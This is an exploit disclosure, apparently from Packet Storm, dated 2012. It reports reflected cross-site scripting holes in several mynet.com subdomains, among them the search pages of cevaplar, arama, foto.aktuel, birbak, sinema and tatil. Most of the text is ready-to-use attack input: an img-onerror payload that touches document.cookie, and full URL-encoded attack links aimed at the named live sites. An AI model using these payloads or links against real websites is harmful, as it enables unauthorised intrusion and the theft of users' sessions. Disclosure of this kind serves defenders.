Various mynet.com sites suffer from a cross site scripting vulnerability.
313120e7301950a799a15a3cf6ad10e07d7ebc177f2a7e037a399b89b05cb1f6# Exploit Title: Mynet XSS (ALL)
# Date: 10.08.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: Php
----------------
http://cevaplar.mynet.com/ search box
http://cevaplar.mynet.com/Search.aspx?q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.cookie%29;%3E
"><img src=x onerror=prompt(document.cookie);>
----------------
http://arama.mynet.com // search box
"><img src=x onerror=prompt(document.cookie);>
http://arama.mynet.com/web/%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E/1/?cx=partner-pub-5464020032963120%3Aww4q6j-259k&cof=FORID%3A10&ie=UTF-8&q=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E
----------------
http://foto.aktuel.mynet.com
"><img src=x onerror=prompt(document.cookie);>
http://foto.aktuel.mynet.com/dak/%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E/
----------------
http://birbak.mynet.com/
"><img src=x onerror=prompt(document.cookie);>
http://birbak.mynet.com/arama/%22%3E%3Cimg%20src=x%20onerror=prompt%28document.cookie%29;%3E
----------------
http://sinema.mynet.com/
"><img src=x onerror=prompt(document.cookie);>
http://sinema.mynet.com/arama/film,%20oyuncu,%20i%C3%A7erik,%20sinema%22%3E%3Cimg%20src=x%20onerror=prompt%28document.cookie%29;%3E
----------------
http://tatil.mynet.com/ search box
"><img src=x onerror=prompt(document.cookie);>
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed